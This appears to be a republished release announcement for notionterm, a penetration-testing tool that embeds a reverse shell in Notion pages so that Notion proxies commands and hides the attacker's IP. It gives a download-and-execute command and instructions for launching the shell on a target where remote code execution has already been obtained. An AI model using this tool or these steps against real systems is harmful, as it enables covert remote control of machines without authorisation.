notionterm v1.0.1 releases: Embed reverse shell in Notion pages

by do son · Published June 1, 2022 · Updated October 10, 2022

notionterm – Embed reverse shell in Notion pages

FOR ➕:

Hiding attacker IP in a reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell)
Demo
Quick proof insertion within the report
High available and shareable reverse shell (desktop, browser, mobile)
Encrypted and authenticated remote shell

NOT FOR ➖:

Long and interactive shell session (see tacos for that)

Why? 🤔

The focus was on making something fun while still being usable, but that’s not meant to be THE solution for reverse shell in the pentester’s arsenal

How

Just use notion as usual and launch notionterm on target.

Changelog v1.0.1

Helper script to ease usage and launching (without having to remember flag etc)

wrap-notionterm.sh

Install

Requirements 🖊️

Notion software and API key
Allowed HTTP communication between the target and notion domain
Prior RCE on target

From release: curl -lO -L https://github.com/ariary/notionterm/releases/latest/download/notionterm && chmod +x notionterm

Quickstart

Set-up

Create the “reverse shell” page in Notion: Page template
Give the permissions to notionterm to access the page (with the notion api key)

Run (details)

Start notionterm
Activate the reverse shell (with the button ON )
do your reverse shell stuff
Shutdown the reverse shell (OFF)

👟 Run

# On target with prior RCE
./notionterm

Configuration can be made using:

Flags
Configuration table in notion page

Server mode

To quickly obtain terminal in any notion page you can use the server mode (Requirement: integration w/ write access to the page)

First, Launch notionterm on target with server mode enable:

notionterm -serve [flags]

Then, when/where you want to get a terminal in your notion page create an embed block with url containing the page id (to get it)CTRL+L: https://[TARGET_URL]/notionterm?url=[PAGE_ID].

Wait…

And that’s all!